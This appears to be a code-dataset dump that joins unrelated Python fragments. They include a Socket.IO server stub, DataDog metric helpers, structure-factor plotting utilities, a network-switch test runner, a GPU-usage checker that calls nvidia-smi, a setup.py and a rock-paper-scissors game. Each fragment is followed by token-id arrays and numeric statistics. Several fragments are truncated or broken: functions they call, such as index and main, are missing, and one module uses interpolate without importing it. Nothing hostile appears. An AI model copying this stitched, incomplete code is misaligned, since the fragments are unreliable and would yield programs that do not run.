file_properties_df = mock_data.mock_file_properties_df(row_count,region_location_count=1)
# selected_location_ids = list(set(file_properties_df.locationId.values))
region_location = zip(list(file_properties_df.region.values),
list(file_properties_df.locationId.values))
region_location = list(set(region_location))
fill_value_func = ones
for tag_name in tag_names:
resulting_output_file_paths = mock_data.mock_results_4input_files(
file_properties_df,
fill_value_func,
func_input_path,
results_tag_id=tag_name,
channel_count=channel_count,
)
del resulting_output_file_paths
cmap = pl.cm.tab10
a_cmap = cmap
my_cmaps = visutils.add_normal_dist_alpha(a_cmap)
for region, location_id in region_location[0:1]:
print(region, location_id)
file_prop_df_filtered = file_properties_df[file_properties_df.region ==
region]
file_prop_df_filtered = file_properties_df[file_properties_df.locationId
== location_id]
region_location_name = '-'.join([region, location_id])
_ = mock_data.mock_clipping_results_dict_file(
file_prop_df_filtered,
region_location_name,
clipping_results_path,
)
visutils.vis_preds_with_clipping(region,
location_id,
file_prop_df_filtered,
input_data_freq,
output_data_freq,
tag_names,
my_cmaps,
func_input_path,
clipping_results_path,
func_output_path,
id2name,
clipping_threshold=1.0)
| [
37811,
51,
3558,
329,
1490,
26791,
13,
9078,
37811,
198,
11748,
277,
2518,
400,
392,
1754,
26,
277,
2518,
400,
392,
1754,
13,
21633,
3419,
198,
11748,
269,
21370,
198,
11748,
4818,
8079,
198,
11748,
4423,
346,
198,
198,
2,
6738,
2603,... | 2.068155 | 3,448 |
from aiohttp import web
import socketio
# creates a new Async Socket IO Server
sio = socketio.AsyncServer()
# Creates a new Aiohttp Web Application
app = web.Application()
# Binds our Socket.IO server to our Web App
# instance
sio.attach(app)
# we can define aiohttp endpoints just as we normally
# would with no change
# If we wanted to create a new websocket endpoint,
# use this decorator, passing in the name of the
# event we wish to listen out for
@sio.on('message')
# We bind our aiohttp endpoint to our app
# router
app.router.add_get('/', index)
# We kick off our server
if __name__ == '__main__':
web.run_app(app) | [
6738,
257,
952,
4023,
1330,
3992,
201,
198,
11748,
17802,
952,
201,
198,
201,
198,
2,
8075,
257,
649,
1081,
13361,
47068,
24418,
9652,
201,
198,
82,
952,
796,
17802,
952,
13,
42367,
10697,
3419,
201,
198,
2,
7921,
274,
257,
649,
317... | 2.92 | 225 |
"""Compatibility functions for DataDog integrations.
"""
from __future__ import absolute_import, print_function, unicode_literals
import logging
import six
from datadog import api, statsd
from requests.exceptions import HTTPError
from .utils import init_datadog
logger = logging.getLogger(__name__)
def create_event(title, fmt_text, priority='low', text_args=(),
alert_level='info', **kwargs):
"""Create a DataDog Event.
:type title: str
:param title: The event title for DataDog.
:type fmt_text: str
:param fmt_text: The pre-formatted text string. Send in the format string
and text args for logging. This must be % formatted.
:type aggregation_key: str
:param aggregation_key: Aggregate results on DataDog
:type priority: str
:param priority: "low", "normal"
:type text_args: tuple
:param text_args: The tuple of text args for fmt_text
:type alert_level: str
:param alert_level: "error", "warning", "info", or "success"
"""
if init_datadog():
try:
create_kwargs = {
'title': title,
'text': fmt_text % text_args,
'priority': priority,
'alert_level': alert_level,
}
create_kwargs.update(kwargs)
api.Event.create(**create_kwargs)
except HTTPError as exc:
logger.error('Error occurred connecting to DataDog: %s',
six.text_type(exc))
logger.log(alert_level, fmt_text, *text_args)
except Exception as exc:
logger.error('An unknown error occurred in event: %s',
six.text_type(exc))
else:
logger.log(loglevel(alert_level), fmt_text, *text_args)
def create_gauge(title, value, tags=None, sample_rate=1):
"""Create a statsd gauge event for DataDog.
:type title: str
:param title: The metric to track
:type value: numeric
:param value: The value of the metric
:type tags: list
:param tags: The tags to attach to the metric for analysis
:type sample_rate: int
:param sample_rate:
"""
if init_datadog():
try:
statsd.gauge(metric=title, value=value, tags=tags,
sample_rate=sample_rate)
except HTTPError as exc:
logger.error('DataDog returned error calling statsd %s',
six.text_type(exc))
except Exception as exc:
logger.error('An unknown error occurred in gauge: %s',
six.text_type(exc))
else:
log_msg = '{}: %d'.format(title)
logger.info(log_msg, value)
def create_increment(metric, **kwargs):
"""Create a statsd increment event for DataDog.
:type metric: str
:param metric: The metric to increment
"""
if init_datadog():
try:
statsd.increment(metric, **kwargs)
except HTTPError as exc:
logger.error('DataDog returned error calling statsd %s',
six.text_type(exc))
except Exception as exc:
logger.error('An unknown error occurred in gauge: %s',
six.text_type(exc))
else:
log_msg = '{}: %d'.format(metric)
logger.info(log_msg)
def loglevel(log_level):
"""Return the log-level for the logging module.
:type log_level: str
:param log_level: The log-level string
:returns: int
"""
levels = {
'info': logging.INFO,
'error': logging.ERROR,
'warning': logging.WARNING,
'success': logging.INFO,
}
return levels[log_level]
| [
37811,
7293,
25901,
5499,
329,
6060,
32942,
4132,
9143,
13,
198,
37811,
198,
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
11,
3601,
62,
8818,
11,
28000,
1098,
62,
17201,
874,
198,
198,
11748,
18931,
198,
11748,
2237,
198,
198,
6738,
... | 2.284381 | 1,607 |
#!/usr/bin/env python
#example taken from https://pypi.python.org/pypi/uncertainties/3.0.1
from uncertainties import ufloat
x = ufloat(2, 0.25)
print x
square = x**2 # Transparent calculations
print square
print square.nominal_value
print square.std_dev # Standard deviation
print square - x*x
from uncertainties.umath import * # sin(), etc.
print sin(1+x**2)
print (2*x+1000).derivatives[x] # Automatic calculation of derivatives
from uncertainties import unumpy # Array manipulation
random_vars = unumpy.uarray([1, 2], [0.1, 0.2])
print random_vars
print random_vars.mean()
print unumpy.cos(random_vars)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
2,
20688,
2077,
422,
3740,
1378,
79,
4464,
72,
13,
29412,
13,
2398,
14,
79,
4464,
72,
14,
19524,
1425,
4278,
14,
18,
13,
15,
13,
16,
198,
6738,
36553,
1330,
334,
22468,
198,
... | 2.970874 | 206 |
import torch
from backend.services.entity_extraction.application.ai.settings import Settings
| [
11748,
28034,
198,
6738,
30203,
13,
30416,
13,
26858,
62,
2302,
7861,
13,
31438,
13,
1872,
13,
33692,
1330,
16163,
628
] | 4.47619 | 21 |
import matplotlib.pyplot as plt
import numpy as np
from structure_factor.utils import _bin_statistics, _sort_vectors
# plot functions
def plot_poisson(x, axis, c="k", linestyle=(0, (5, 10)), label="Poisson"):
r"""Plot the pair correlation function :math:`g_{poisson}` and the structure factor :math:`S_{poisson}` corresponding to the Poisson point process.
Args:
x (numpy.ndarray): x coordinate.
axis (plt.Axes): Axis on which to add the plot.
c (str, optional): Color of the plot. see `matplotlib <https://matplotlib.org/2.1.1/api/_as_gen/matplotlib.pyplot.plot.html>`_ . Defaults to "k".
linestyle (tuple, optional): Linstyle of the plot. see `linestyle <https://matplotlib.org/stable/gallery/lines_bars_and_markers/linestyles.html>`_. Defaults to (0, (5, 10)).
label (regexp, optional): Label of the plot. Defaults to "Poisson".
Returns:
plt.Axes: Plot of the pair correlation function and the structure factor of the Poisson point process over ``x``.
"""
axis.plot(x, np.ones_like(x), c=c, linestyle=linestyle, label=label)
return axis
def plot_summary(
x,
y,
axis,
scale="log",
label=r"mean $\pm$ 3 $\cdot$ std",
fmt="b",
ecolor="r",
**binning_params
):
r"""Loglog plot the summary results of :py:func:`~structure_factor.utils._bin_statistics` i.e., means and errors bars (3 standard deviations).
Args:
x (numpy.ndarray): x coordinate.
y (numpy.ndarray): y coordinate.
axis (plt.Axes): Axis on which to add the plot.
label (regexp, optional): Label of the plot. Defaults to r"mean $\pm$ 3 $\cdot$ std".
Returns:
plt.Axes: Plot of the results of :py:meth:`~structure_factor.utils._bin_statistics` applied on ``x`` and ``y`` .
"""
bin_centers, bin_mean, bin_std = _bin_statistics(x, y, **binning_params)
axis.plot(bin_centers, bin_mean, "b.")
axis.errorbar(
bin_centers,
bin_mean,
yerr=3 * bin_std, # 3 times the standard deviation
fmt=fmt,
lw=1,
ecolor=ecolor,
capsize=3,
capthick=1,
label=label,
zorder=4,
)
axis.legend(loc=4, framealpha=0.2)
axis.set_yscale(scale)
axis.set_xscale(scale)
return axis
def plot_exact(x, y, axis, label):
r"""Loglog plot of a callable function ``y`` evaluated on the vector ``x``.
Args:
x (numpy.ndarray): x coordinate.
y (numpy.ndarray): y coordinate.
axis (plt.Axes): Axis on which to add the plot.
label (regexp, optional): Label of the plot.
Returns:
plt.Axes: Plot of ``y`` with respect to ``x``.
"""
x, y, _ = _sort_vectors(x, y)
axis.plot(x, y, "g", label=label)
return axis
def plot_approximation(
x, y, axis, rasterized, label, color, linestyle, marker, markersize, scale="log"
):
r"""Loglog plot of ``y`` w.r.t. ``x``.
Args:
x (numpy.ndarray): x coordinate.
y (numpy.ndarray): y coordinate.
axis (plt.Axes): Axis on which to add the plot.
rasterized (bool): Rasterized option of `matlplotlib.plot <https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.plot.html#:~:text=float-,rasterized,-bool>`_.
label (regexp, optional): Label of the plot.
color (matplotlib.color): Color of the plot. see `color <https://matplotlib.org/2.1.1/api/_as_gen/matplotlib.pyplot.plot.html>`_ .
linestyle (tuple): Style of the plot. see `linestyle <https://matplotlib.org/stable/gallery/lines_bars_and_markers/linestyles.html>`_.
marker (matplotlib.marker): Marker of `marker <https://matplotlib.org/stable/api/markers_api.html>`_.
markersize (float): Marker size.
scale(str, optional): Trigger between plot scales of `plt.Axes <https://matplotlib.org/stable/api/_as_gen/matplotlib.axes.Axes.set_xscale.html>`_. Defaults to `log`.
Returns:
plt.Axes: Loglog plot of ``y`` w.r.t. ``x``
"""
axis.plot(
x,
y,
color=color,
linestyle=linestyle,
marker=marker,
label=label,
markersize=markersize,
rasterized=rasterized,
)
axis.set_yscale(scale)
axis.set_xscale(scale)
return axis
def plot_estimation_showcase(
k_norm,
estimation,
axis=None,
scale="log",
exact_sf=None,
error_bar=False,
label=r"$\widehat{S}$",
rasterized=True,
file_name="",
**binning_params
):
r"""Loglog plot of the results of the scattering intensity :py:meth:`~structure_factor.structure_factor.StructureFactor.scattering_intensity`, with the means and error bars over specific number of bins found via :py:func:`~structure_factor.utils._bin_statistics`.
Args:
k_norm (numpy.ndarray): Wavenumbers.
estimation (numpy.ndarray): Scattering intensity corresponding to ``k_norm``.
axis (plt.Axes, optional): Axis on which to add the plot. Defaults to None.
scale(str, optional): Trigger between plot scales of `matplotlib.plot <https://matplotlib.org/stable/api/_as_gen/matplotlib.axes.Axes.set_xscale.html>`_. Defaults to `log`.
exact_sf (callable, optional): Structure factor of the point process. Defaults to None.
error_bar (bool, optional): If ``True``, ``k_norm`` and correspondingly ``estimation`` are divided into sub-intervals (bins). Over each bin, the mean and the standard deviation of ``estimation`` are derived and visualized on the plot. Note that each error bar corresponds to the mean +/- 3 standard deviation. To specify the number of bins, add it to the kwargs argument ``binning_params``. For more details see :py:meth:`~structure_factor.utils._bin_statistics`. Defaults to False.
rasterized (bool, optional): Rasterized option of `matlplotlib.plot <https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.plot.html#:~:text=float-,rasterized,-bool>`_. Defaults to True.
file_name (str, optional): Name used to save the figure. The available output formats depend on the backend being used. Defaults to "".
"""
k_norm = k_norm.ravel()
estimation = estimation.ravel()
if axis is None:
_, axis = plt.subplots(figsize=(8, 6))
plot_approximation(
k_norm,
estimation,
axis=axis,
label=label,
color="grey",
linestyle="",
marker=".",
markersize=1.5,
rasterized=rasterized,
scale=scale,
)
plot_poisson(k_norm, axis=axis)
if error_bar:
plot_summary(k_norm, estimation, axis=axis, scale=scale, **binning_params)
if exact_sf is not None:
plot_exact(k_norm, exact_sf(k_norm), axis=axis, label=r"Exact $S(\mathbf{k})$")
axis.set_xlabel(r"Wavenumber ($||\mathbf{k}||$)")
axis.set_ylabel(r"Structure factor ($S(\mathbf{k})$)")
axis.legend(loc=4, framealpha=0.2)
if file_name:
fig = axis.get_figure()
fig.savefig(file_name, bbox_inches="tight")
return axis
def plot_estimation_imshow(k_norm, si, axis, file_name):
r"""Color level 2D plot, centered on zero.
Args:
k_norm (numpy.ndarray): Wavenumbers.
si (numpy.ndarray): Scattering intensity corresponding to ``k_norm``.
axis (plt.Axes): Axis on which to add the plot.
file_name (str, optional): Name used to save the figure. The available output formats depend on the backend being used. Defaults to "".
"""
if axis is None:
_, axis = plt.subplots(figsize=(14, 8))
if len(k_norm.shape) < 2:
raise ValueError(
"the scattering intensity should be evaluated on a meshgrid or choose plot_type = 'plot'. "
)
else:
log_si = np.log10(si)
m, n = log_si.shape
m /= 2
n /= 2
f_0 = axis.imshow(
log_si,
extent=[-n, n, -m, m],
cmap="PRGn",
)
plt.colorbar(f_0, ax=axis)
# axis.title.set_text("Scattering intensity")
if file_name:
fig = axis.get_figure()
fig.savefig(file_name, bbox_inches="tight")
return axis
def plot_estimation_all(
point_pattern,
k_norm,
estimation,
exact_sf=None,
error_bar=False,
label=r"$\widehat{S}$",
rasterized=True,
file_name="",
window_res=None,
scale="log",
**binning_params
):
r"""Construct 3 subplots: point pattern, associated scattering intensity plot, associated scattering intensity color level (only for 2D point processes).
Args:
point_pattern (:py:class:`~structure_factor.point_pattern.PointPattern`): Object of type PointPattern containing a realization ``point_pattern.points`` of a point process, the window where the points were simulated ``point_pattern.window`` and (optionally) the intensity of the point process ``point_pattern.intensity``.
k_norm (numpy.ndarray): Wavenumbers.
estimation (numpy.ndarray): Scattering intensity corresponding to ``k_norm``.
exact_sf (callable, optional): Structure factor of the point process. Defaults to None.
error_bar (bool, optional): If ``True``, ``k_norm`` and correspondingly ``estimation`` are divided into sub-intervals (bins). Over each bin, the mean and the standard deviation of ``estimation`` are derived and visualized on the plot. Note that each error bar corresponds to the mean +/- 3 standard deviation. To specify the number of bins, add it to the kwargs argument ``binning_params``. For more details see :py:meth:`~structure_factor.utils._bin_statistics`. Defaults to False.
rasterized (bool, optional): Rasterized option of `matlplotlib.plot <https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.plot.html#:~:text=float-,rasterized,-bool>`_. Defaults to True.
file_name (str, optional): Name used to save the figure. The available output formats depend on the backend being used. Defaults to "".
window_res (:py:class:`~structure_factor.spatial_windows.AbstractSpatialWindow`, optional): New restriction window. It is useful when the sample of points is large, so for time and visualization purposes, it is better to restrict the plot of the point process to a smaller window. Defaults to None.
scale(str, optional): Trigger between plot scales of `matplotlib.plot <https://matplotlib.org/stable/api/_as_gen/matplotlib.axes.Axes.set_xscale.html>`_. Defaults to `log`.
"""
figure, axes = plt.subplots(1, 3, figsize=(24, 6))
point_pattern.plot(axis=axes[0], window=window_res)
plot_estimation_showcase(
k_norm,
estimation,
axis=axes[1],
exact_sf=exact_sf,
error_bar=error_bar,
label=label,
rasterized=rasterized,
file_name="",
scale=scale,
**binning_params,
)
plot_estimation_imshow(k_norm, estimation, axes[2], file_name="")
if file_name:
figure.savefig(file_name, bbox_inches="tight")
return axes
def plot_sf_hankel_quadrature(
k_norm,
estimation,
axis,
scale,
k_norm_min,
exact_sf,
color,
error_bar,
label,
file_name,
**binning_params
):
r"""Plot the approximations of the structure factor (results of :py:meth:`~structure_factor.structure_factor.StructureFactor.quadrature_estimator_isotropic`) with means and error bars over bins, see :py:meth:`~structure_factor.utils._bin_statistics`.
Args:
k_norm (numpy.ndarray): Vector of wavenumbers (i.e., norms of waves) on which the structure factor has been approximated.
estimation (numpy.ndarray): Approximation of the structure factor corresponding to ``k_norm``.
axis (plt.Axes): Support axis of the plots.
scale(str): Trigger between plot scales of `matplotlib.plot <https://matplotlib.org/stable/api/_as_gen/matplotlib.axes.Axes.set_xscale.html>`_.
k_norm_min (float): Estimated lower bound of the wavenumbers (only when ``estimation`` was approximated using **Ogata quadrature**).
exact_sf (callable): Theoretical structure factor of the point process.
error_bar (bool): If ``True``, ``k_norm`` and correspondingly ``si`` are divided into sub-intervals (bins). Over each bin, the mean and the standard deviation of ``si`` are derived and visualized on the plot. Note that each error bar corresponds to the mean +/- 3 standard deviation. To specify the number of bins, add it to the kwargs argument ``binning_params``. For more details see :py:meth:`~structure_factor.utils._bin_statistics`. Defaults to False.
file_name (str): Name used to save the figure. The available output formats depend on the backend being used.
label (regexp): Label of the plot.
Keyword Args:
binning_params: (dict): Used when ``error_bar=True``, by the method :py:meth:`~structure_factor.utils_bin_statistics` as keyword arguments (except ``"statistic"``) of ``scipy.stats.binned_statistic``.
"""
if axis is None:
fig, axis = plt.subplots(figsize=(8, 5))
plot_approximation(
k_norm,
estimation,
axis=axis,
label=label,
marker=".",
linestyle="",
color=color,
markersize=4,
scale=scale,
rasterized=False,
)
if exact_sf is not None:
plot_exact(k_norm, exact_sf(k_norm), axis=axis, label=r"Exact $S(k)$")
if error_bar:
plot_summary(k_norm, estimation, axis=axis, scale=scale, **binning_params)
plot_poisson(k_norm, axis=axis)
if k_norm_min is not None:
sf_interpolate = interpolate.interp1d(
k_norm, estimation, axis=0, fill_value="extrapolate", kind="cubic"
)
axis.loglog(
k_norm_min,
sf_interpolate(k_norm_min),
"ro",
label=r"$k_{min}$",
)
axis.legend()
axis.set_xlabel(r"Wavenumber ($k$)")
axis.set_ylabel(r"Structure factor ($S(k)$)")
plt.show()
if file_name:
fig = axis.get_figure()
fig.savefig(file_name, bbox_inches="tight")
return axis
| [
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
11748,
299,
32152,
355,
45941,
198,
198,
6738,
4645,
62,
31412,
13,
26791,
1330,
4808,
8800,
62,
14269,
3969,
11,
4808,
30619,
62,
303,
5217,
198,
198,
2,
7110,
5499,
628,
... | 2.48519 | 5,672 |
import unittest
if __name__ == '__main__':
from test.test_pyswitch.test_interface_OverlayGateway import \
InterfaceOverlayGatewayTestCase
from test.test_pyswitch.test_interface_vrf import InterfaceVRFTestCase
from test.test_pyswitch.test_interface_pvlan import \
InterfacePrivateVlanTestCase
from test.test_pyswitch.test_interface_evpn import InterfaceEVPNTestCase
from test.test_pyswitch.test_interface_virtual_port import \
InterfaceVirtualPortTestCase
from test.test_pyswitch.test_interface_port_channel import \
InterfacePortChannelCase
from test.test_pyswitch.test_interface_SwitchPort import \
InterfaceSwitchPort
from test.test_pyswitch.test_interface import InterfaceGenericCase
from test.test_pyswitch.test_device import DeviceTestCase
from test.test_pyswitch.test_fabric_service import FabricServiceTestCase
from test.test_pyswitch.test_lldp import LLDPTestCase
device = unittest.TestLoader().loadTestsFromTestCase(DeviceTestCase)
fs = unittest.TestLoader().loadTestsFromTestCase(FabricServiceTestCase)
lldp = unittest.TestLoader().loadTestsFromTestCase(LLDPTestCase)
# interface related
vrf = unittest.TestLoader().loadTestsFromTestCase(InterfaceVRFTestCase)
ovg = unittest.TestLoader().loadTestsFromTestCase(
InterfaceOverlayGatewayTestCase)
pvlan = unittest.TestLoader().loadTestsFromTestCase(
InterfacePrivateVlanTestCase)
evpn = unittest.TestLoader().loadTestsFromTestCase(InterfaceEVPNTestCase)
generic = unittest.TestLoader().loadTestsFromTestCase(
InterfaceGenericCase)
vp = unittest.TestLoader().loadTestsFromTestCase(
InterfaceVirtualPortTestCase)
portChannel = unittest.TestLoader().loadTestsFromTestCase(
InterfacePortChannelCase)
swp = unittest.TestLoader().loadTestsFromTestCase(InterfaceSwitchPort)
alltests = unittest.TestSuite([
device,
fs,
lldp,
vrf,
generic,
portChannel,
ovg,
pvlan,
swp,
evpn,
vp
])
unittest.TextTestRunner(verbosity=2, failfast=False).run(alltests)
| [
11748,
555,
715,
395,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
422,
1332,
13,
9288,
62,
79,
893,
42248,
13,
9288,
62,
39994,
62,
5886,
10724,
22628,
1014,
1330,
3467,
198,
220,
220,
220... | 2.614183 | 832 |
import os.path as op
import re
import sys
from toolshed import reader, nopen
from collections import defaultdict
import numpy as np
from itertools import cycle
import pylab as pl
import seaborn
colors = cycle(seaborn.color_palette('Set1', 8))
BASES = False
FLAGS="-F%i" % (0x4 | 0x100 | 0x200)
if __name__ == "__main__":
import argparse
p = argparse.ArgumentParser()
p.add_argument("--reads", help="reads file", required=True)
p.add_argument("bams", nargs="+")
a = p.parse_args()
main(a.bams, reads=a.reads)
| [
11748,
28686,
13,
6978,
355,
1034,
198,
11748,
302,
198,
11748,
25064,
198,
6738,
4899,
704,
1330,
9173,
11,
299,
9654,
198,
6738,
17268,
1330,
4277,
11600,
198,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
340,
861,
10141,
1330,
6772... | 2.603865 | 207 |
# -*- coding:utf-8 -*-
from Arya.backends.base_module import BaseSaltModule | [
2,
532,
9,
12,
19617,
25,
40477,
12,
23,
532,
9,
12,
198,
6738,
39477,
64,
13,
1891,
2412,
13,
8692,
62,
21412,
1330,
7308,
43061,
26796
] | 2.777778 | 27 |
from atlas import *
from ..support import *
from .bpred import BranchPredictor
from .btb import BranchTargetBuffer
from .ras import ReturnAddressStack
@Module
def IFetchStage():
"""IFetch Stage
TODO: Documentation
"""
io = Io({
'pc': Input(Bits(C['core-width'])),
'mispred': Input(mispred_bundle),
'ras_ctrl': Input(ras_ctrl_bundle),
'next_pc': Output(Bits(C['core-width'])),
'if1_if2': Output(if_bundle)
})
bpred = Instance(BranchPredictor())
btb = Instance(BranchTargetBuffer())
ras = Instance(ReturnAddressStack())
ras.ctrl <<= io.ras_ctrl
next_pc = Wire(Bits(C['paddr-width']))
if1_pc = Wire(Bits(C['paddr-width']))
btb.cur_pc <<= next_pc
bpred.cur_pc <<= next_pc
#
# Misprediction Update Handling
#
btb.update.valid <<= io.mispred.valid
btb.update.pc <<= io.mispred.pc
btb.update.target <<= io.mispred.target
btb.update.is_return <<= io.mispred.is_return
bpred.update.valid <<= io.mispred.valid
bpred.update.pc <<= io.mispred.pc
bpred.update.taken <<= io.mispred.taken
#
# The predicted next PC comes from either the next sequential PC or the
# predicted target address in the BTB. Note that pred_pc _can_ be wrong and
# that's ok because the misspeculation will be caught later in the pipeline.
#
if1_pc <<= io.pc
with bpred.pred.taken & btb.pred.valid & ~btb.pred.is_return:
if1_pc <<= btb.pred.target
with btb.pred.valid & btb.pred.is_return:
if1_pc <<= ras.top
#
# The actual next PC is either the prediction, a value from the return
# address stack (RAS) or the correct PC (correction from a misspeculation).
#
with io.mispred.valid:
next_pc <<= io.mispred.target
with otherwise:
next_pc <<= if1_pc + 4
io.next_pc <<= next_pc
io.if1_if2.valid <<= True
io.if1_if2.pc <<= if1_pc
NameSignals(locals()) | [
6738,
379,
21921,
1330,
1635,
198,
6738,
11485,
11284,
1330,
1635,
198,
198,
6738,
764,
65,
28764,
1330,
20551,
47,
17407,
273,
198,
6738,
764,
18347,
65,
1330,
20551,
21745,
28632,
198,
6738,
764,
8847,
1330,
8229,
20231,
25896,
198,
1... | 2.312132 | 849 |
import typing
from coincurve import PrivateKey
from pytest import fixture, raises
from nekoyume.block import Block
from nekoyume.exc import InvalidMoveError
from nekoyume.move import (
CreateNovice,
HackAndSlash,
LevelUp,
Move,
Say,
Sleep,
)
from nekoyume.user import User
@fixture
| [
11748,
19720,
198,
198,
6738,
11194,
333,
303,
1330,
15348,
9218,
198,
6738,
12972,
9288,
1330,
29220,
11,
12073,
198,
198,
6738,
497,
74,
726,
2454,
13,
9967,
1330,
9726,
198,
6738,
497,
74,
726,
2454,
13,
41194,
1330,
17665,
21774,
... | 2.747826 | 115 |
import os
import re
__all__=['get_user','gpu_usage','check_empty','get_info']
def get_user(pid):
'''
get_user(pid)
Input a pid number , return its creator by linux command ps
'''
ps=os.popen('ps -eo pid,user|grep '+str(pid))
lines=ps.readlines()
for line in lines:
return re.split('[ \n]',line)[-2]
return None
def gpu_usage():
'''
gpu_usage()
return two lists. The first list contains usage percent of every GPU. The second list contains the memory used of every GPU. The information is obtained by command 'nvidia-smi'
'''
pid_current,percent,memory,gpu_used=get_info()
return percent,memory
def check_empty():
'''
check_empty()
return a list containing all GPU ids that no process is using currently.
'''
gpu_unused=list()
pid_current,percent,memory,gpu_used=get_info()
for i in range(0,len(percent)):
if not i in gpu_used:
gpu_unused.append(i)
if len(gpu_unused)==0:
return None
else:
return (gpu_unused)
def get_users(gpu_id):
'''
return a dict {user1:mem1,user2:mem2} on GPU with id gpu_id
'''
ns=os.popen('nvidia-smi')
lines_ns=ns.readlines()
users_dict=dict()
for line in lines_ns:
#if line.find('%')==-1 and line.find('MiB')!=-1:
if 'MiB' in line:
arrs=re.split('[ ]+',line)
g_id=arrs[1]
if not int(g_id)==gpu_id:
continue
pid=arrs[2]
mem=int(line.split('MiB')[0][-5:])
user=get_user(pid)
if user in users_dict.keys():
users_dict[user]=mem+users_dict[user]
else:
users_dict[user]=mem
return users_dict
def get_info():
'''
pid_list,percent,memory,gpu_used=get_info()
return a dict and three lists. pid_list has pids as keys and gpu ids as values, showing which gpu the process is using
'''
gpu_used=list()
pid_current=list()
ns=os.popen('nvidia-smi')
lines_ns=ns.readlines()
percent=list()
memory=list()
pid_list=dict()
for line in lines_ns:
if line.find('%')!=-1:
percent.append(int(line.split('%')[-2][-3:]))
memory.append(int(line.split('MiB')[0][-5:]))
if line.find('%')==-1 and line.find('MiB')!=-1:
#processes
arrs=re.split('[ ]+',line)
gpu_id=arrs[1]
pid=arrs[2]
process_name=arrs[4]
gpu_used.append(int(gpu_id))
mem=int(arrs[-2][:-3])
if pid in pid_list.keys():
pid_list[pid].append(gpu_id)
else:
pid_list[pid]=list()
pid_list[pid].append(gpu_id)
pid_current=pid_list.keys()
gpu_used=list(set(gpu_used))
return pid_list,percent,memory,gpu_used
if __name__=="__main__":
print(get_info())
| [
11748,
28686,
198,
11748,
302,
198,
834,
439,
834,
28,
17816,
1136,
62,
7220,
41707,
46999,
62,
26060,
41707,
9122,
62,
28920,
41707,
1136,
62,
10951,
20520,
198,
4299,
651,
62,
7220,
7,
35317,
2599,
198,
220,
220,
220,
705,
7061,
198... | 2.003448 | 1,450 |
"""
`````````````````
Run it:
.. code:: bash
$ pip install qrcode-converter
$ python app/run.py [inner_img_path] [content] [width] [height]
Links
`````
* `website <https://github.com/jackqt/py-qrcode-generator/>`_
* `documentation <https://github.com/jackqt/py-qrcode-generator/>`_
"""
import re
import ast
from setuptools import setup
_version_re = re.compile(r'__version__\s+=\s+(.*)')
with open('app/__init__.py', 'rb') as f:
version = str(ast.literal_eval(_version_re.search(
f.read().decode('utf-8')).group(1)))
setup(
name='qrcode-converter',
version=version,
url='https://github.com/jackqt/py-qrcode-generator/',
license='MIT',
author='Jack Li',
author_email='jack.qingtian@gmail.com',
description='A qrcode generator with inner image',
long_description=__doc__,
packages=['app'],
include_package_data=True,
zip_safe=False,
platforms='any',
install_requires=[
'Pillow>=4.0.0',
'qrcode>=5.3'
],
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
| [
37811,
198,
33153,
33153,
33153,
33153,
63,
198,
10987,
340,
25,
198,
198,
492,
2438,
3712,
27334,
628,
220,
220,
220,
720,
7347,
2721,
10662,
6015,
1098,
12,
1102,
332,
353,
198,
220,
220,
220,
720,
21015,
598,
14,
5143,
13,
9078,
... | 2.469325 | 652 |
import unittest
from .palindrome_number import Solution
| [
11748,
555,
715,
395,
198,
6738,
764,
18596,
521,
5998,
62,
17618,
1330,
28186,
628
] | 3.8 | 15 |
from django.db import models
| [
6738,
42625,
14208,
13,
9945,
1330,
4981,
198
] | 3.625 | 8 |
from random import randint
from time import sleep
itens = ('Pedra', 'Papel','Tesoura')
computador = randint(0, 2)
print('''\033[1;31mSuas opções\033[m:
[ 0 ] PEDRA
[ 1 ] PAPEL
[ 2 ] TESOURA''')
jogador = int(input('\033[1;34mQual é a sua Jogada?\033[m '))
print('\033[1;30mJO\033[m')
sleep(1)
print('\033[1;34mKEN\033[m')
sleep(1)
print('\033[1;33mPO!!\033[m')
sleep(1)
print('\033[35m-=\033[m' * 11)
print('\033[1;32mComputador jogou\033[m ' ' \033[1;35m{}\033[m'.format(itens[computador]))
print('\033[1;36mJogador jogou\033[m ' ' \033[1;32m{}\033[m'. format(itens[jogador]))
print('\033[35m-=\033[m' * 11)
if computador == 0:# computador jogou PEDRA
if jogador == 0:
print('\033[1;37mEMPATE\033[m')
elif jogador == 1:
print('\033[1;43mJOGADOR VENCEU\033[m')
elif jogador == 2:
print('\033[1;31mCOMPUTADOR VENCEU\033[m')
else:
print('\033[4;33;40mJOGADA INVÁLIDA\033[m!')
elif computador == 1: # computador jogou PAPEL
if jogador == 0:
print('\033[1;31mCOMPUTADOR VENCEU\033[m')
elif jogador == 1:
print('\033[1;37mEMPATE\033[m')
elif jogador == 2:
print('\033[1;34mJOGADOR VENCEU\033[m')
else:
print('\033[4;33;;40mJOGADA INVÁLIDA\033[m!')
elif computador == 2: # computador jogou TESOURA
if jogador == 0:
print('\033[1;34mJOGADOR VENCEU\033[m')
elif jogador == 1:
print('\033[1;31mCOMPUTADOR VENCEU\033[m')
elif jogador == 2:
print('\033[1;37mEMPATE\033[m')
else:
print('\033[4;33;mJOGADA INVÁLIDA\033[m!')
| [
6738,
4738,
1330,
43720,
600,
198,
6738,
640,
1330,
3993,
198,
270,
641,
796,
19203,
43468,
430,
3256,
705,
47,
499,
417,
41707,
36504,
280,
430,
11537,
198,
785,
1996,
7079,
796,
43720,
600,
7,
15,
11,
362,
8,
198,
4798,
7,
7061,
... | 1.910867 | 819 |
#!/usr/bin/env python2.7
from flask import Flask, url_for, make_response, render_template, request
from flask import json, jsonify, current_app, Blueprint
from flask.ext.sqlalchemy import SQLAlchemy
from sqlalchemy.sql import func
from json import dumps
